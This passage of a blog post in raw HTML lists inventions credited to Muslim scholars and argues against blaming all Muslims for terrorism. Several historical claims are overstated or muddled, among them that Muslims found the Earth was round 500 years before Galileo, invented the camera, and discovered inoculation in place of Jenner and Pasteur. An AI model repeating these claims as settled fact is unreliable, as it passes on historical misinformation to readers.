- Experimental Physics </b></span><b style="font-family: courier; font-size: large;"> </b></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Soap </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Shampoo </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Perfume/spirits </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Irrigation </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Crank-shaft, internal combustion engine, valves, pistons </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Combination locks - Architectural innovation (pointed arch -European Gothic cathedrals adopted this technique as it made the building much stronger, rose windows, dome buildings, round towers, etc.) </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Surgical instruments </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Anesthesia </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Windmill </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Treatment of Cowpox </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Fountain pen </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Numbering system </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Algebra/Trigonometry </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Modern Cryptology </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Crystal glasses </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Carpets </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Checks </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- University </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Optics </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Toothbrush </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Hospitals </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Bathing </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Quilting </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Marinerβs Compass </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Soft drinks </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Pendulum </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Braille </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Cosmetics </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Surgery </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Calligraphy </b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
- Manufacturing of paper and cloth the list goes on.../</b></span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjov3U1PaUCa_P9c8PT5KCLiUWCzZFPWJL-4mVPucRsQKkwgQTsXhzPeajt5CCysGvFTgAyJcMsTY896GQpx8D2BKpO_wpMX0hnnrYZSk3ryyoLK9lrDo-Yt-dQ_qoGWgk055Z3Hfz8WNQ/s1600/imagine+a+world+without+muslim.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjov3U1PaUCa_P9c8PT5KCLiUWCzZFPWJL-4mVPucRsQKkwgQTsXhzPeajt5CCysGvFTgAyJcMsTY896GQpx8D2BKpO_wpMX0hnnrYZSk3ryyoLK9lrDo-Yt-dQ_qoGWgk055Z3Hfz8WNQ/s1600/imagine+a+world+without+muslim.jpg" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who realized that light ENTERS our eyes, unlike the Greeks who thought we EMITTED rays, and so invented the camera from this discovery.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who first tried to FLY in 852, even though it is the Wright Brothers who have taken the credit.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim by the name of Jabir ibn Hayyan who was known as the founder of modern Chemistry. He transformed alchemy into chemistry. He invented: distillation, purification, oxidation, evaporation, and filtration. He also discovered sulfuric and nitric acid.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It is a Muslim, by the name of Al-Jazari who is known as the father of robotics.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who was the architect of Henry Vβs castle.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who invented hollow needles to suck cataracts from the eyes, a technique still used today.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was a Muslim who actually discovered inoculation, not Jenner and Pasteur to treat cowpox. The West just brought it over from Turkey.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was Muslims who contributed much to mathematics like Algebra and Trigonometry, which was imported over to Europe 300 years later to Fibonnaci and the rest.</b></span></div>
<div style="text-align: center;">
<span style="font-family: courier; font-size: medium;"><b><br /></b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
It was Muslims who discovered that the Earth was round 500 years before Galileo did.</b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
The list goes on and on....</b></span></div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
Just imagine a world without Muslims. Now I think you probably meant, JUST IMAGINE A WORLD WITHOUT TERRORISTS. And then I would agree, the world would definitely be a better place without those pieces of filth. But to hold a whole group responsible for the actions of a few is ignorant and racist. No one would ever expect Christians or White people to be held responsible for the acts of Timothy McVeigh (Oklahoma bombing) or Andreas Brevik (Norway killing), or the gun man that shot Congresswoman Giffords in head, wounded 12 and killed 6 people, and rightly so because they had nothing to do with those incidents! Just like the rest of the 1.5 billion Muslims have nothing to do with this incident!<br />
<br /></b></span></div>
</div>
<div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b>
./collected</b></span></div><div style="text-align: center;"><span style="font-family: courier; font-size: medium;"><b><br /></b></span></div><div style="text-align: left;"><span style="font-family: courier;"><b>References:</b></span></div><div style="text-align: left;"><span style="font-family: courier; font-size: x-small;"><a href="https://www.youtube.com/watch?v=SxJ2OC7iXo0&ab_channel=1001Inventions">https://www.youtube.com/watch?v=SxJ2OC7iXo0&ab_channel=1001Inventions</a></span></div><div style="text-align: left;"><span style="font-size: x-small;"><a href="https://en.wikipedia.org/wiki/List_of_scientists_in_medieval_Islamic_world">https://en.wikipedia.org/wiki/List_of_scientists_in_medieval_Islamic_world</a></span></div>
</div>
TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0